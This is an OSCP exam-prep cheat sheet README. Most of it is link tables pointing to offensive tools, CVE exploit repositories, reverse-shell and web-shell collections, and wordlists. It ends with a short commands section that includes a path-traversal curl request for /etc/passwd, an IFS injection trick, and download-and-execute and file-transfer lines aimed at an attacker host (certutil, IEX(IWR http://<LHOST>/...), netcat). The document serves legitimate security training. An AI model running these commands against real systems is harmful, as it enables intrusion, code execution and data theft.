base on OSCP Cheat Sheet <p align="center"> <img width="300" height="300" src="/images/kali-linux.svg"> </p> # OSCP Cheat Sheet   </br>   Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. As OffSec published the `OffSec Certified Professional Plus` or `OSCP+` certification which is only valid for `3 years`, I now will add more advanced techniques like for example `Active Directory Certificate Services (ADCS) Abuse` and `Shadow Credentials Attacks` to cover as much course content as possible. Feel free to submit a pull request or contact me on [X](https://twitter.com/syr0_) — or preferably [Bluesky](https://bsky.app/profile/0xsyr0.bsky.social) — if you have any suggestions. Every contribution is appreciated! > [!IMPORTANT] > A guy on X got a point. Automatic exploitation tools like `sqlmap` are prohibited to use in the exam. The same goes for the automatic exploitation functionality of `LinPEAS`. > I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam. > Inform yourself before taking the exam! Here are the link to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps. Also here are two more important resources you should check out before you take the exam. - [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) - [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams) > [!NOTE] > This repository will also try to cover as much as possible of the tools required for the proving grounds boxes. Thank you for reading. <br> ## Table of Contents - [Basics](#basics) - [Information Gathering](#information-gathering) - [Vulnerability Analysis](#vulnerability-analysis) - [Web Application Analysis](#web-application-analysis) - [Database Assessment](#database-assessment) - [Password Attacks](#password-attacks) - [Exploitation Tools](#exploitation-tools) - [Post Exploitation](#post-exploitation) - [Exploit Databases](#exploit-databases) - [CVEs](#cves) - [Payloads](#payloads) - [Wordlists](#wordlists) - [Reporting](#reporting) - [Social Media Resources](#social-media-resources) - [Commands](#commands) - [Basics](#basics-1) - [curl](#curl) - [File Transfer](#file-transfer) - [FTP](#ftp) - [Kerberos](#kerberos) - [Linux](#linux) - [Microsoft Windows](#microsoft-windows) - [NFS](#nfs) - [PHP Webserver](#php-webserver) - [Ping](#ping) - [Port Forwarding](#port-forwarding-1) - [Python Webserver](#python-webserver) - [RDP](#rdp) - [showmount](#showmount) - [SMB](#smb) - [smbclient](#smbclient) - [SSH](#ssh) - [Time and Date](#time-and-date) - [Tmux](#tmux) - [Upgrading Shells](#upgrading-shells) - [VirtualBox](#virtualbox) - [virtualenv](#virtualenv) - [Information Gathering](#information-gathering-1) - [memcached](#memcached) - [NetBIOS](#netbios) - [Nmap](#nmap) - [Port Scanning](#port-scanning) - [snmpwalk](#snmpwalk) - [Web Application Analysis](#web-application-analysis-1) - [Burp Suite](#burp-suite) - [cadaver](#cadaver) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [ffuf](#ffuf) - [Gobuster](#gobuster) - [GitTools](#gittools) - [Local File Inclusion (LFI)](#local-file-inclusion-lfi) - [PDF PHP Inclusion](#pdf-php-inclusion) - [PHP Upload Filter Bypasses](#php-upload-filter-bypasses) - [PHP Filter Chain Generator](#php-filter-chain-generator) - [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc) - [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) - [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti) - [Upload Vulnerabilities](#upload-vulnerabilities) - [wfuzz](#wfuzz) - [WPScan](#wpscan) - [XML External Entity (XXE)](#xml-external-entity-xxe) - [Database Analysis](#database-analysis) - [impacket-mssqlclient](#impacket-mssqlclient) - [MongoDB](#mongodb) - [MSSQL](#mssql) - [MySQL](#mysql) - [NoSQL Injection](#nosql-injection) - [PostgreSQL](#postgresql) - [Redis](#redis) - [SQL Injection](#sql-injection) - [SQL Truncation Attack](#sql-truncation-attack) - [sqlite3](#sqlite3) - [sqsh](#sqsh) - [Password Attacks](#password-attacks-1) - [DonPAPI](#donpapi) - [fcrack](#fcrack) - [Group Policy Preferences (GPP)](#group-policy-preferences-gpp) - [hashcat](#hashcat) - [Hydra](#hydra) - [John](#john) - [Kerbrute](#kerbrute) - [LaZagne](#lazagne) - [mimikatz](#mimikatz) - [NetExec](#netexec) - [pypykatz](#pypykatz) - [Spray-Passwords](#spray-passwords) - [Exploitation Tools](#exploitation-tools-1) - [Metasploit](#metasploit) - [Post Exploitation](#post-exploitation-1) - [Account Operators Group Membership](#account-operators-group-membership) - [Active Directory](#active-directory) - [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs) - [ADCSTemplate](#adcstemplate) - [ADMiner](#adminer) - [BloodHound](#bloodhound) - [BloodHound Python](#bloodhound-python) - [bloodyAD](#bloodyAD) - [Certify](#certify) - [Certipy](#certipy) - [enum4linux-ng](#enum4linux-ng) - [Evil-WinRM](#evil-winrm) - [Impacket](#impacket-1) - [JAWS](#jaws) - [Kerberos](#kerberos-1) - [ldapsearch](#ldapsearch) - [Linux](#linux-1) - [Microsoft Windows](#microsoft-windows-1) - [PassTheCert](#passthecert) - [Penelope](#penelope) - [PKINITtools](#pkinittools) - [Port Scanning](#port-scanning-1) - [powercat](#powercat) - [Powermad](#powermad) - [PowerShell](#powershell) - [PrivescCheck](#privesccheck) - [pwncat](#pwncat) - [rpcclient](#rpcclient) - [Rubeus](#rubeus) - [RunasCs](#runascs) - [Seatbelt](#seatbelt) - [Shadow Credentials](#shadow-credentials) - [smbpasswd](#smbpasswd) - [winexe](#winexe) - [Social Engineering Tools](#social-engineering-tools) - [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro) - [Microsoft Windows Library Files](#microsoft-windows-library-files) - [CVE](#cve) - [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc) - [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe) - [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass) - [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe) - [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe) - [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day) - [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe) - [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day) - [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe) - [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe) - [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass) - [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day) - [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe) - [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover) - [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce) - [CVE-2025-29927: Next.js Authentication Bypass](#cve-2025-29927-nextjs-authenication-bypass) - [GodPotato LPE](#godpotato-lpe) - [Juicy Potato LPE](#juicy-potato-lpe) - [JuicyPotatoNG LPE](#juicypotatong-lpe) - [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe) - [PrintSpoofer LPE](#printspoofer-lpe) - [SharpEfsPotato LPE](#sharpefspotato-lpe) - [Shocker Container Escape](#shocker-container-escape) - [Payloads](#payloads-1) - [Exiftool](#exiftool) - [Reverse Shells](#reverse-shells) - [Web Shells](#web-shells) - [Templates](#templates) - [ASPX Web Shell](#aspx-web-shell) - [Bad YAML](#bad-yaml) - [Wordlists](#wordlists-1) - [Bash](#bash) - [CeWL](#cewl) - [CUPP](#cupp) - [crunch](#crunch) - [JavaScript Quick Wordlist](#javascript-quick-wordlist) - [Username Anarchy](#username-anarchy) ### Basics | Name | URL | | --- | --- | | Chisel | https://github.com/jpillora/chisel | | CyberChef | https://gchq.github.io/CyberChef | | Ligolo-ng | https://github.com/nicocha30/ligolo-ng | | Swaks | https://github.com/jetmore/swaks | ### Information Gathering | Name | URL | | --- | --- | | Nmap | https://github.com/nmap/nmap | ### Vulnerability Analysis | Name | URL | | --- | --- | | nikto | https://github.com/sullo/nikto | | Sparta | https://github.com/SECFORCE/sparta | ### Web Application Analysis | Name | URL | | --- | --- | | ffuf | https://github.com/ffuf/ffuf | | fpmvuln | https://github.com/hannob/fpmvuln | | Gobuster | https://github.com/OJ/gobuster | | JSON Web Tokens | https://jwt.io | | JWT_Tool | https://github.com/ticarpi/jwt_tool | | Leaky Paths | https://github.com/ayoubfathi/leaky-paths | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator | | PHPGGC | https://github.com/ambionics/phpggc | | Spose | https://github.com/aancw/spose | | Wfuzz | https://github.com/xmendez/wfuzz | | WhatWeb | https://github.com/urbanadventurer/WhatWeb | | WPScan | https://github.com/wpscanteam/wpscan | ### Database Assessment | Name | URL | | --- | --- | | RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand | | Redis RCE | https://github.com/Ridter/redis-rce | | Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server | | SQL Injection Cheatsheet | https://tib3rius.com/sqli.html | ### Password Attacks | Name | URL | | --- | --- | | Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet | | Firefox Decrypt | https://github.com/unode/firefox_decrypt | | hashcat | https://hashcat.net/hashcat | | Hydra | https://github.com/vanhauser-thc/thc-hydra | | John | https://github.com/openwall/john | | keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey | | KeePwn | https://github.com/Orange-Cyberdefense/KeePwn | | Kerbrute | https://github.com/ropnop/kerbrute | | LaZagne | https://github.com/AlessandroZ/LaZagne | | mimikatz | https://github.com/gentilkiwi/mimikatz | | NetExec | https://github.com/Pennyw0rth/NetExec | | ntlm.pw | https://ntlm.pw | | pypykatz | https://github.com/skelsec/pypykatz | ### Exploitation Tools | Name | URL | | --- | --- | | Evil-WinRM | https://github.com/Hackplayers/evil-winrm | | Metasploit | https://github.com/rapid7/metasploit-framework | ### Post Exploitation | Name | URL | | --- | --- | | ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller | | ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate | | ADMiner | https://github.com/Mazars-Tech/AD_Miner | | adPEAS | https://github.com/ajm4n/adPEAS | | BloodHound Docker | https://github.com/belane/docker-bloodhound | | BloodHound | https://github.com/BloodHoundAD/BloodHound | | BloodHound | https://github.com/ly4k/BloodHound | | BloodHound Collectors | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors | | BloodHound Python | https://github.com/dirkjanm/BloodHound.py | | bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin | | Certify | https://github.com/GhostPack/Certify | | Certipy | https://github.com/ly4k/Certipy | | certipy-merged | https://github.com/zimedev/certipy-merged | | Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory | | DonPAPI | https://github.com/login-securite/DonPAPI | | enum4linux-ng | https://github.com/cddmp/enum4linux-ng | | Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries | | GTFOBins | https://gtfobins.github.io | | Impacket | https://github.com/fortra/impacket | | Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries | | JAWS | https://github.com/411Hall/JAWS | | KrbRelay | https://github.com/cube0x0/KrbRelay | | KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp | | Krbrelayx | https://github.com/dirkjanm/krbrelayx | | LAPSDumper | https://github.com/n00py/LAPSDumper | | LES | https://github.com/The-Z-Labs/linux-exploit-suggester | | LinEnum | https://github.com/rebootuser/LinEnum | | lsassy | https://github.com/Hackndo/lsassy | | Moriaty | https://github.com/BC-SECURITY/Moriarty | | nanodump | https://github.com/fortra/nanodump | | PassTheCert | https://github.com/AlmondOffSec/PassTheCert | | PEASS-ng | https://github.com/carlospolop/PEASS-ng | | Penelope | https://github.com/brightio/penelope | | PKINITtools | https://github.com/dirkjanm/PKINITtools | | powercat | https://github.com/besimorhino/powercat | | PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack | | PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 | | PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 | | PowerView.py | https://github.com/aniqfakhrul/powerview.py | | PPLdump | https://github.com/itm4n/PPLdump | | Priv2Admin | https://github.com/gtworek/Priv2Admin | | PrivescCheck | https://github.com/itm4n/PrivescCheck | | PSPKIAudit | https://github.com/GhostPack/PSPKIAudit | | pspy | https://github.com/DominicBreuker/pspy | | pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit | | pwncat | https://github.com/calebstewart/pwncat | | pypykatz | https://github.com/skelsec/pypykatz | | pyWhisker | https://github.com/ShutdownRepo/pywhisker | | Rubeus | https://github.com/GhostPack/Rubeus | | RunasCs | https://github.com/antonioCoco/RunasCs | | RustHound | https://github.com/OPENCYBER-FR/RustHound | | scavenger | https://github.com/SpiderLabs/scavenger | | SharpADWS | https://github.com/wh0amitz/SharpADWS | | SharpCollection | https://github.com/Flangvik/SharpCollection | | SharpChromium | https://github.com/djhohnstein/SharpChromium | | SharpHound | https://github.com/BloodHoundAD/SharpHound | | SharpView | https://github.com/tevora-threat/SharpView | | Sherlock | https://github.com/rasta-mouse/Sherlock | | WADComs | https://wadcoms.github.io | | Watson | https://github.com/rasta-mouse/Watson | | WESNG | https://github.com/bitsadmin/wesng | Whisker | https://github.com/eladshamir/Whisker | | Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check | | Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html | | Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation | ### Exploit Databases | Database | URL | | --- | --- | | 0day.today Exploit Database | https://0day.today | | Exploit Database | https://www.exploit-db.com | | Packet Storm | https://packetstormsecurity.com | | Sploitus | https://sploitus.com | ### CVEs | CVE | Descritpion | URL | | --- | --- | --- | | CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker | | CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 | | CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs | | CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow | | CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 | | CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 | | CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue | | CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 | | CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE | | CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 | | CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 | | CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 | | CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 | | CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC | | CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln | | CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock | | CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC | | CVE-2020-1472 | ZeroLogon PE Checker & Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon | | CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 | | CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 | | CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 | | CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 | | CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 | | CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE | | CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool | | CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 | | CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 | | CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit | | CVE-2021-3156 | Sudo / sudoedit LPE | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit | | CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 | | CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 | | CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 | | CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit | | CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation | | CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare | | CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam | | CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce | | CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver | | CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal | | CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin | | CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac | | CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit | | CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe | | CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits | | CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool | | CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en | | CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro | | CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 | | CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn | | CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 | | CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 | | CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC | | CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit | | CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL | | CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato | | CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 | | CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b | | CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc | | CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 | | CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC | | CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce | | CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 | | CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 | | CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 | | CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass | | CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 | | CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 | | CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 | | CVE-2024-1086 | Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 | | CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 | | CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 | | CVE-2024-49138 | Windows Common Log File System Driver LPE | https://github.com/MrAle98/CVE-2024-49138-POC | | CVE-2025-24813 | Apache Tomcat Deserialization RCE (1) | https://github.com/iSee857/CVE-2025-24813-PoC | | CVE-2025-24813 | Apache Tomcat Deserialization RCE (2) | https://github.com/absholi7ly/POC-CVE-2025-24813 | | CVE-2025-29927 | Next.js Authentication Bypass | https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware | | n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce | | n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce | | n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc | | n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato | | n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato | | n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato | | n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato | | n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato | | n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato | | n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato | | n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG | | n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato | | n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 | | n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato | | n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG | | n/a | RustPotato LPE | https://github.com/safedv/RustPotato | | n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato | | n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato | | n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato | | n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato | | n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato | | n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer | | n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer | | n/a | Shocker Container Escape | https://github.com/gabrtv/shocker | | n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare | | n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter | | n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM | | n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 | | n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub | | n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits | | n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits | ### Payloads | Name | URL | | --- | --- | | Payload Box | https://github.com/payloadbox | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | phpgcc | https://github.com/ambionics/phpggc | | PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell| | webshell | https://github.com/tennc/webshell | | Web-Shells | https://github.com/TheBinitGhimire/Web-Shells | ### Wordlists | Name | URL | | --- | --- | | bopscrk | https://github.com/R3nt0n/bopscrk | | CeWL | https://github.com/digininja/cewl | | COOK | https://github.com/giteshnxtlvl/cook | | CUPP | https://github.com/Mebus/cupp | | Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists | | SecLists | https://github.com/danielmiessler/SecLists | | Username Anarchy | https://github.com/urbanadventurer/username-anarchy | ### Reporting | Name | URL | | --- | --- | | OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault | | SysReptor | https://github.com/Syslifters/sysreptor | | SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting | | SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ | ### Social Media Resources | Name | URL | | --- | --- | | OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x | | Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ | | HackTricks | https://book.hacktricks.xyz/ | | HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation | | Hacking Articles | https://www.hackingarticles.in/ | | Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ | | OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP | | OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 | | IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA | | IppSec.rocks | https://ippsec.rocks/?# | | 0xdf | https://0xdf.gitlab.io/ | ## Commands ### Basics #### curl ```shell curl -v http://<DOMAIN> // verbose output curl -X POST http://<DOMAIN> // use POST method curl -X PUT http://<DOMAIN> // use PUT method curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd // use --path-as-is to handle /../ or /./ in the given URL curl --proxy http://127.0.0.1:8080 // use proxy curl -F myFile=@<FILE> http://<RHOST> // file upload curl${IFS}<LHOST>/<FILE> // Internal Field Separator (IFS) example ``` #### File Transfer ##### Certutil ```cmd certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE> ``` ##### Netcat ```shell nc -lnvp <LPORT> > <FILE> nc <RHOST> <RPORT> < <FILE> ``` ##### Impacket ```shell sudo impacket-smbserver <SHARE> ./ sudo impacket-smbserver <SHARE> . -smb2support copy * \\<LHOST>\<SHARE> ``` ##### PowerShell ```cmd iwr <LHOST>/<FILE> -o <FILE> IEX(IWR http://<LHOST>/<FILE>) -UseBasicParsing powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE> ``` ##### Bash only 